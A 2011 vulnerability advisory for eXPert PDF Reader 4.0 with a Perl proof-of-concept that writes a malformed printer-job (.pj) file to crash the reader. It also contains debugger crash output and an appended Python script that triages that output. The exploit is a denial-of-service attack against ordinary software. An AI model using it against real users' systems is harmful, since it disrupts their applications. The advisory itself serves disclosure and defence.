eXPert PDF Reader 4.0 NULL Pointer Dereference / Heap Corruption

26 Feb 2011 00:00:00 | Reported by LiquidWorm | Type: packetstorm | Source: packetstormsecurity.com

eXPert PDF Reader 4.0 NULL Pointer Dereference and Heap Corruption Denial Of Service vulnerability in Visagesoft produc

Code
```perl
#!/usr/local/bin/perl
#
#
# eXPert PDF Reader 4.0 NULL Pointer Dereference and Heap Corruption Denial Of Service
#
#
# Vendor: Visagesoft
# Product web page: http://www.visagesoft.com
# Affected version: 4.0.210
#
# Summary: eXPert PDF Reader is a free pdf viewer software that lets you view and print
# pdf documents on windows operating systems.
#
# Desc: The vulnerability is caused due to a NULL pointer dereference when processing
# malicious Printer Job (.pj) files and can be exploited to crash the application and
# cause a heap corruption and denial of service scenarios.
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
#
# ----------------------------------------------------------------------------------
#
# HEAP[vspdfreader.exe]: Invalid allocation size - 82828290 (exceeded 7ffdefff)
# (77c.d48): Unknown exception - code 0eedfade (first chance)
# (77c.d48): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000001 ebx=02d7a188 ecx=00bd311c edx=00000002 esi=00000002 edi=0012fe24
# eip=00446cc9 esp=0012fb6c ebp=0012fb84 iopl=0 nv up ei ng nz ac pe cy
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210297
# *** WARNING: Unable to verify checksum for image00400000
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0x46cc9:
# 00446cc9 8b04b0 mov eax,dword ptr [eax+esi*4] ds:0023:00000009=????????
#
# image00400000+0x46cc9:
# 00446cc9 8b04b0 mov eax,dword ptr [eax+esi*4]
# 00446ccc 5e pop esi
# 00446ccd 5b pop ebx
# 00446cce c3 ret
# 00446ccf 90 nop
# 00446cd0 8bc8 mov ecx,eax
# 00446cd2 b201 mov dl,1
# 00446cd4 a1f48d4300 mov eax,dword ptr [image00400000+0x38df4 (00438df4)]
#
# image00400000+0x38df4:
# 00438df4 4c dec esp
# 00438df5 8e4300 mov es,word ptr [ebx]
# 00438df8 0000 add byte ptr [eax],al
# 00438dfa 0000 add byte ptr [eax],al
# 00438dfc 0000 add byte ptr [eax],al
# 00438dfe 0000 add byte ptr [eax],al
# 00438e00 0000 add byte ptr [eax],al
# 00438e02 0000 add byte ptr [eax],al
#
# ----------------------------------------------------------------------------------
#
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
# Advisory ID: ZSL-2011-5000
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5000.php
#
#
# 25.02.2011
#

my $file = "dniz0r.pj";
# The test file is empty; the commented-out alternative is a four-byte file.
my $data = ""; #my $data = "J" x(2+2);
# Three-argument open with an error check, so a failed write is not reported as success.
open(my $FILE, '>', $file) or die "Cannot create $file: $!";
print $FILE $data;
close($FILE);
print "\npj File Created successfully\n";
```
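A triage sketch for the debugger output quoted in the advisory, added here as an example and not part of the original advisory or its script: it recomputes the faulting address from the register dump and checks the heap manager's allocation-size complaint. The function name `triage` and the 64 KiB near-NULL threshold are assumptions of this example; the embedded log lines are copied from the output above.

```python
import re

# Excerpt of the debugger output quoted in the advisory above.
CRASH_LOG = """\
HEAP[vspdfreader.exe]: Invalid allocation size - 82828290 (exceeded 7ffdefff)
(77c.d48): Access violation - code c0000005 (first chance)
eax=00000001 ebx=02d7a188 ecx=00bd311c edx=00000002 esi=00000002 edi=0012fe24
eip=00446cc9 esp=0012fb6c ebp=0012fb84 iopl=0 nv up ei ng nz ac pe cy
00446cc9 8b04b0 mov eax,dword ptr [eax+esi*4] ds:0023:00000009=????????
"""

NULL_PAGE_LIMIT = 0x10000  # assumption: addresses below 64 KiB count as near-NULL

REG_RE = re.compile(r"\b(e(?:ax|bx|cx|dx|si|di|ip|sp|bp))=([0-9a-f]{8})\b")
OPERAND_RE = re.compile(r"\[(e[a-z]{2})(?:\+(e[a-z]{2})\*([1248]))?\]")
REPORTED_RE = re.compile(r"\b[c-gs]s:[0-9a-f]{4}:([0-9a-f]{8})=")
HEAP_RE = re.compile(r"Invalid allocation size - ([0-9a-f]+) \(exceeded ([0-9a-f]+)\)")


def triage(log: str) -> dict:
    """Recompute the faulting address and flag the oversized heap request."""
    regs = {name: int(value, 16) for name, value in REG_RE.findall(log)}
    result = {"eip": regs.get("eip")}

    operand = OPERAND_RE.search(log)
    if operand:
        base, index, scale = operand.groups()
        address = regs[base]
        if index:
            address += regs[index] * int(scale)
        address &= 0xFFFFFFFF  # 32-bit wraparound
        reported = REPORTED_RE.search(log)
        result["effective_address"] = address
        # Cross-check against the address the debugger printed after the operand.
        result["matches_debugger"] = bool(reported) and int(reported.group(1), 16) == address
        result["near_null"] = address < NULL_PAGE_LIMIT

    heap = HEAP_RE.search(log)
    if heap:
        size, limit = (int(v, 16) for v in heap.groups())
        result["alloc_size"] = size
        result["alloc_oversized"] = size > limit
    return result


if __name__ == "__main__":
    for key, value in triage(CRASH_LOG).items():
        print(key, hex(value) if type(value) is int else value)
```

With eax=1 and esi=2 the operand `[eax+esi*4]` resolves to address 9, which agrees with the `ds:0023:00000009` the debugger reports and places the read just above NULL.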
